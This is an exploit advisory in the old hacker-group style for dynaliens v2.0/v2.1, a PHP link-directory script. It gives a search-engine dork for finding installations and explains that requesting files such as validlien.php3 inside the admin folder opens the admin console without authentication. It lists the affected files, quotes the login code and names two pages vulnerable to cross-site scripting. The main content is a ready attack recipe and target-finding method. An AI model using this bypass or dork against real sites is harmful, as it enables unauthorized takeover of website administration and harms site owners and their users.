* dynaliens v2.0/v2.1 bypass admin authentification + XSS * By : sn0oPy * Risk : high * site : http://www.spiderforce.fr.st/ * Dork : inurl:"/dynaliens" * exploit : normaly when we add "/admin" to the link, like that http://www.target.ma/dynaliens/admin we are face to face with a restricted zone area, but if we add "validlien.php3" after the admin folder we are redirected to the consol admin without authentification. the AUTH_USER is present just in/for the index : if ($auth == 0) { if(!$PHP_AUTH_USER) { Header("WWW-authenticate: basic realm=\"$domaine\""); Header("HTTP/1.0 401 Unauthorized"); // Ci dessous le code qui est affich si l'on click le bouton Cancel EnteteADMIN(); .... if ($PHP_AUTH_USER==$login && $PHP_AUTH_PW==$pwd) { if (@mysql_connect ($cfgHote, $cfgUser, $cfgPass)) { $sql = "SELECT * FROM $tb_rub"; $sql = mysql_db_query($cfgBase,$sql); $nbrub = mysql_num_rows($sql); $sql2 = "SELECT * FROM $tb_liens WHERE valid=0"; $sql2 = mysql_db_query($cfgBase,$sql2); $addlien = mysql_num_rows($sql2); $sql3 = "SELECT * FROM $tb_liens WHERE valid=1"; $sql3 = mysql_db_query($cfgBase,$sql3); $dellien = mysql_num_rows($sql3); EnteteADMIN(); br(4); echo "<center>"; DebutTableau("#FFFFFF", "1", "0", "30%"); DebutTableau("#5A6BA5", "20", "0", "100%"); echo "<center>"; echo "<font color='#FDFC65'><b>CONSOLE D'ADMINISTRATION</b></font>"; echo "</center>"; you can do it with any one of this files when the admin has forget to reedit his files: validlien.php3 supprlien.php3 supprub.php3 validlien.php3 confsuppr.php3 modiflien.php3 confmodif.php3 XSS : http://www.target.ma/dynaliens/recherche.php3 XSS : http://www.target.ma/dynaliens/ajouter.php3 * contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed] * greetz : [subzero], Avg Team(forums.avenir-geopolitique.net). * Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2722